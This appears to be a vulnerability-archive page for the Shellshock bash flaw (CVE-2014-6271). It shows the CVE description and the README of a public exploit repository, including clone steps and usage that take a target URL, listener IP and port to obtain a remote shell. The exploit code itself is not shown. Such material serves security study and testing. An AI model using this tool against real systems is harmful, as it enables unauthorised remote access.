Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source
Associated Vulnerability
Title:GNU Bash 远程代码执行漏洞 (CVE-2014-6271)
Description:GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Description
Shellshock exploit (CVE-2014-6271)
Readme
# Shellshock Exploit (CVE-2014-6271)

#### Exploit
## <u>Description</u>
This repository contains an exploit for a vulnerability that affects unix-based systems. Please note that this is merely a proof-of-concept script created for educational purposes and should be used responsibly.

This exploit is designed to demonstrate how the shellshock attack works and how it could be used to gain shell access to a system through a maliciously crafted request header.

### <u>Disclaimer</u>
This repository is intended for educational purposes only. Do not use this code or any information contained within for malicious purposes. Always follow ethical guidelines and respect the law.


Usage:

	python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]
Example:

	python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234


Prerequisites:
- A local development environment
- Python installed

### <u>To run this exploit, you can follow these steps:</u>
Clone this repository to your local machine.
```
git clone https://github.com/AlissonFaoli/Shellshock.git
```

Navigate to the project directory.
```
cd Shellshock
```

Run the shellshock.py script.
```
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
```

###### Please remember that this exploit should never be used against real software or systems you're not authorized to test. Unauthorized access or any malicious activity is illegal.

#### <u>License</u>
_This exploit is released under the MIT License. You can find more information about this in the LICENSE file._


# Author: Alisson Faoli

#### Github: https://github.com/AlissonFaoli
#### LinkedIn: https://linkedin.com/in/alisson-faoli



<b>If you have any questions or concerns about this exploit, please feel free to contact the author</b>
File Snapshot

[4.0K] /data/pocs/76fc822909fd04e01277f6d1169867de5e27d10d ├── [1.0K] LICENSE ├── [1.8K] README.md └── [2.8K] shellshock.py 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →